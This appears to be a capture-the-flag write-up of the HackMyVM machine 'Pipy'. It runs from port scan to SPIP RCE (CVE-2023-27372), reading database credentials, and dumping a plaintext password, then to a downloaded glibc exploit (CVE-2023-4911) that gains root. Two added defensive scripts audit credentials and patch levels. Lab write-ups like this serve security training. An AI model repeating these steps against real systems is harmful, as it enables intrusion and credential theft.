HackMyVM Pipy
Information gathering
root@kali:~# nmap 192.168.100.54 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 01:57 EDT
Nmap scan report for dev.loooower (192.168.100.54)
Host is up (0.00076s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:99:73:FC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 5.79 seconds
root@kali:~# nmap 192.168.100.54 -p80 -sC -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 02:40 EDT
Nmap scan report for dev.loooower (192.168.100.54)
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-generator: SPIP 4.2.0
|_http-title: Mi sitio SPIP
MAC Address: 08:00:27:99:73:FC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.66 seconds
SPIP version 4.2.0 was found: https://www.exploit-db.com/exploits/51536
There is an RCE, so I used a PoC directly to pop a shell. I used this one: https://github.com/0SPwn/CVE-2023-27372-PoC/blob/main/exploit.py
Privilege escalation to angela
www-data@pipy:/var/www$ ls -al
total 20
drwxr-xr-x 4 www-data www-data 4096 Oct 5 2023 .
drwxr-xr-x 14 root root 4096 Oct 2 2023 ..
-rw------- 1 www-data www-data 130 Oct 5 2023 .bash_history
drwxrwxrwx 3 www-data www-data 4096 Oct 5 2023 .local
drwxr-xr-x 11 www-data www-data 4096 Oct 4 2023 html
www-data@pipy:/var/www$ cat .bash_history
whoami
exit
exit
reset xterm
export TERM=xterm-256color
stty rows 51 cols 197
ls
nano
ls
cat config/connect.php
mysql -u root -p
www-data@pipy:/var/www/html$ cat config/connect.php
<?php
if (!defined("_ECRIRE_INC_VERSION")) return;
defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);
$GLOBALS['spip_connect_version'] = 0.8;
spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');
Connect to MySQL with the password dbpassword:
MariaDB [spip]> show tables
-> ;
+-------------------------+
| Tables_in_spip |
+-------------------------+
| spip_articles |
| spip_auteurs |
| spip_auteurs_liens |
| spip_depots |
| spip_depots_plugins |
| spip_documents |
| spip_documents_liens |
| spip_forum |
| spip_groupes_mots |
| spip_jobs |
| spip_jobs_liens |
| spip_meta |
| spip_mots |
| spip_mots_liens |
| spip_paquets |
| spip_plugins |
| spip_referers |
| spip_referers_articles |
| spip_resultats |
| spip_rubriques |
| spip_syndic |
| spip_syndic_articles |
| spip_types_documents |
| spip_urls |
| spip_versions |
| spip_versions_fragments |
| spip_visites |
| spip_visites_articles |
+-------------------------+
28 rows in set (0.000 sec)
MariaDB [spip]> select * from spip_auteurs;
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id_auteur | nom | bio | email | nom_site | url_site | login | pass | low_sec | statut | webmestre | maj | pgp | htpass | en_ligne | alea_actuel | alea_futur | prefs | cookie_oubli | source | lang | imessage | backup_cles |
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | Angela | | [email protected] | | | angela | 4ng3l4 | | 0minirezo | oui | 2023-10-04 17:28:39 | | | 2023-10-04 13:50:34 | 387046876651c39a45bc836.13502903 | 465278670651d6da4349d85.01841245 | a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";} | NULL | spip | | | 3HnqCYcjg+hKOjCODrOTwhvDGXqQ34zRxFmdchyPL7wVRW3zsPwE6+4q0GlAPo4b4OGRmzvR6NNFdEjARDtoeIAxH88cQZt2H3ENUggrz99vFfCmWHIdJgSDSOI3A3nmnfEg43BDP4q9co/AP0XIlGzGteMiSJwc0fCXOCxzCW9NwvzJYM/u/8cWGGdRALd7fzFYhOY6DmokVnIlwauc8/lwRyNbam1H6+g5ju57cI8Dzll+pCMUPhhti9RvC3WNzC2IUcPnHEM= |
| 2 | admin | | [email protected] | | | admin | $2y$10$.GR/i2bwnVInUmzdzSi10u66AKUUWGGDBNnA7IuIeZBZVtFMqTsZ2 | | 1comite | non | 2023-10-04 17:31:03 | | | 2023-10-04 17:31:03 | 1540227024651d7e881c21a5.84797952 | 439334464651da1526dbb90.67439545 | a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";} | 1118839.6HqFdtVwUs3T6+AJRJOdnZG6GFPNzl4/wAh9i0D1bqfjYKMJSG63z4KPzonGgNUHz+NmYNLbcIM83Tilz5NYrlGKbw4/cDDBE1mXohDXwEDagYuW2kAUYeqd8y5XqDogNsLGEJIzn0o= | spip | fr | oui | |
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
2 rows in set (0.000 sec)
MariaDB [spip]>
The password is stored in plaintext: 4ng3l4
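Two defender-side findings fall out of this step: SPIP connects to the database as root with the password readable in config/connect.php, and an administrator row in spip_auteurs carries a plaintext value in the pass column instead of the bcrypt hash the admin row shows. The following audit script is an added example (not from the original post) that checks both. It embeds the connect.php and the two table rows shown above as constructed sample data, assumes the argument order of spip_connect_db() visible in that file (host, port, login, pass, db, type, prefix), and treats a bcrypt string or a 64-character hex digest as a legitimately hashed value; anything else is flagged.

```python
"""Audit the SPIP database credentials and the spip_auteurs pass column.

Added example, not code from the original post or from SPIP itself.
"""
import re

# Constructed sample: the config/connect.php contents shown above.
SAMPLE_CONNECT_PHP = """<?php
if (!defined("_ECRIRE_INC_VERSION")) return;
defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);
$GLOBALS['spip_connect_version'] = 0.8;
spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');
"""

# Constructed sample: the two spip_auteurs rows shown above, reduced to the
# columns the audit needs. statut 0minirezo is SPIP's administrator status.
SAMPLE_AUTEURS = [
    {"id_auteur": 1, "login": "angela", "pass": "4ng3l4",
     "statut": "0minirezo", "webmestre": "oui"},
    {"id_auteur": 2, "login": "admin",
     "pass": "$2y$10$.GR/i2bwnVInUmzdzSi10u66AKUUWGGDBNnA7IuIeZBZVtFMqTsZ2",
     "statut": "1comite", "webmestre": "non"},
]

BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")
SHA256_HEX_RE = re.compile(r"^[0-9a-f]{64}$")
CONNECT_RE = re.compile(r"spip_connect_db\s*\((.*?)\)\s*;", re.S)


def parse_connect_php(src):
    """Return the single-quoted positional arguments of spip_connect_db().

    Assumption (from the file shown above): index 2 is the DB login and
    index 3 is the DB password. Returns None when no call is present.
    """
    m = CONNECT_RE.search(src)
    if not m:
        return None
    return re.findall(r"'([^']*)'", m.group(1))


def classify_password_field(value):
    """Classify a spip_auteurs.pass value by its storage format."""
    if not value:
        return "empty"
    if BCRYPT_RE.match(value):
        return "bcrypt"
    if SHA256_HEX_RE.match(value):
        return "sha256-hex"
    return "plaintext-or-unknown"


def audit(connect_php_src, auteurs):
    """Return a list of human-readable findings (empty list means clean)."""
    findings = []
    args = parse_connect_php(connect_php_src)
    if args is None:
        findings.append("connect.php: no spip_connect_db() call found")
    else:
        login = args[2] if len(args) > 2 else ""
        if login == "root":
            findings.append(
                "connect.php: SPIP connects to the database as root; "
                "use a dedicated account limited to the spip schema")
        if len(args) > 3 and args[3]:
            findings.append(
                "connect.php: contains the database password; the file must "
                "not be readable by other local users")
    for row in auteurs:
        kind = classify_password_field(row.get("pass"))
        if kind not in ("bcrypt", "sha256-hex"):
            findings.append(
                f"spip_auteurs id {row['id_auteur']} ({row['login']}, "
                f"statut {row['statut']}): pass column is {kind}")
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_CONNECT_PHP, SAMPLE_AUTEURS):
        print("[!]", line)
```

Against the sample data the script reports the root database login, the password present in connect.php, and the angela row; the admin row passes because its value is a well-formed bcrypt hash. On a real instance the rows would come from a `SELECT id_auteur, login, pass, statut, webmestre FROM spip_auteurs` run by the auditor.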
UserFlag
angela@pipy:~$ cat user.txt
dab37650d43787424362d5805140538d
Privilege escalation to root
angela@pipy:~$ ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 192.168.100.54%enp0s3:68 0.0.0.0:*
tcp LISTEN 0 1024 127.0.0.1:4226 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
angela@pipy:~$ nc 127.0.0.1 4226
root
id
angela@pipy:~$ nc 127.0.0.1 4226
id
id
id
I didn't know what this was; I searched for a long time and found nothing useful.
So I tried kernel exploits; after a long time none of them worked, and in the end I looked at a writeup: CVE-2023-4911.
angela@pipy:~$ wget https://github.com/leesh3288/CVE-2023-4911/archive/refs/heads/main.zip
...
angela@pipy:~$ unzip main.zip
Archive: main.zip
acf0d3a8bd4c437475a7c4c83f5790e53e8103cb
creating: CVE-2023-4911-main/
inflating: CVE-2023-4911-main/Makefile
inflating: CVE-2023-4911-main/README.md
inflating: CVE-2023-4911-main/exp.c
inflating: CVE-2023-4911-main/gen_libc.py
angela@pipy:~/CVE-2023-4911-main$ make
gcc -o exp exp.c
python3 gen_libc.py
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
./exp
# id
uid=0(root) gid=0(root) groups=0(root),1000(angela)
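Both footholds on this box came from unpatched software: SPIP 4.2.0 (CVE-2023-27372, fixed upstream in 4.2.1, 4.1.8, 4.0.10 and 3.2.18) and a glibc carrying CVE-2023-4911 (the bug entered upstream glibc in 2.34 and was fixed in 2.39, with distribution backports to earlier package versions). The script below is an added example, not code from the post or from either project, that turns those two facts into a patch-level check. It parses the SPIP version out of the `http-generator` line of the nmap output above and a glibc version out of the first line of `ldd --version`; the ldd line is a constructed sample, since the post never prints the box's glibc version. The glibc result is deliberately only "in the affected range": a distribution package such as Ubuntu's 2.35 may already carry the backported fix, so the package changelog or vendor advisory has the final word.

```python
"""Patch-level checks for SPIP (CVE-2023-27372) and glibc (CVE-2023-4911).

Added example, not from the original post.
"""
import re

# Constructed sample: the service-scan output shown earlier on this page.
SAMPLE_NMAP = """PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-generator: SPIP 4.2.0
|_http-title: Mi sitio SPIP
"""

# Constructed sample of `ldd --version` on an Ubuntu 22.04 host (the post
# never shows the real output); the package suffix is invented.
SAMPLE_LDD = "ldd (Ubuntu GLIBC 2.35-0ubuntu3) 2.35\n"

# Upstream SPIP releases that contain the CVE-2023-27372 fix, per branch.
SPIP_FIXED = {
    (4, 2): (4, 2, 1),
    (4, 1): (4, 1, 8),
    (4, 0): (4, 0, 10),
    (3, 2): (3, 2, 18),
}

# Inclusive range of upstream glibc releases that shipped CVE-2023-4911.
GLIBC_AFFECTED = ((2, 34), (2, 38))


def parse_version(s):
    """'4.2.0' -> (4, 2, 0); tuples compare correctly, strings do not."""
    return tuple(int(x) for x in re.findall(r"\d+", s))


def spip_version_from_nmap(output):
    """Extract the SPIP version from nmap's http-generator line, or None."""
    m = re.search(r"http-generator:\s*SPIP\s+([\d.]+)", output)
    return m.group(1) if m else None


def spip_status(version):
    """'vulnerable', 'patched' or 'unsupported-branch' for CVE-2023-27372."""
    v = parse_version(version)
    branch = v[:2]
    if branch in SPIP_FIXED:
        return "vulnerable" if v < SPIP_FIXED[branch] else "patched"
    if branch > (4, 2):
        return "patched"            # branch released after the fix
    return "unsupported-branch"     # no fix published: treat as vulnerable


def glibc_version_from_ldd(output):
    """Extract the glibc version from the first line of `ldd --version`."""
    first = output.splitlines()[0] if output else ""
    m = re.match(r"ldd \(.*\) (\d+\.\d+)", first)
    return m.group(1) if m else None


def glibc_status(version):
    """Classify an upstream glibc version against CVE-2023-4911."""
    v = parse_version(version)[:2]
    lo, hi = GLIBC_AFFECTED
    if lo <= v <= hi:
        return ("in-affected-range: confirm the distribution package "
                "carries the CVE-2023-4911 fix")
    if v > hi:
        return "patched upstream"
    return "predates the bug"


if __name__ == "__main__":
    spip = spip_version_from_nmap(SAMPLE_NMAP)
    print(f"SPIP {spip}: {spip_status(spip)}")
    glibc = glibc_version_from_ldd(SAMPLE_LDD)
    print(f"glibc {glibc}: {glibc_status(glibc)}")
```

Run against the samples it reports SPIP 4.2.0 as vulnerable and glibc 2.35 as inside the affected range. The SPIP check is exact because the upstream fix versions are known; the glibc check only narrows the question, which is the honest limit of version-string matching on distribution-patched packages.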
RootFlag
# cat root.txt
ab55ed08716cd894e8097a87dafed016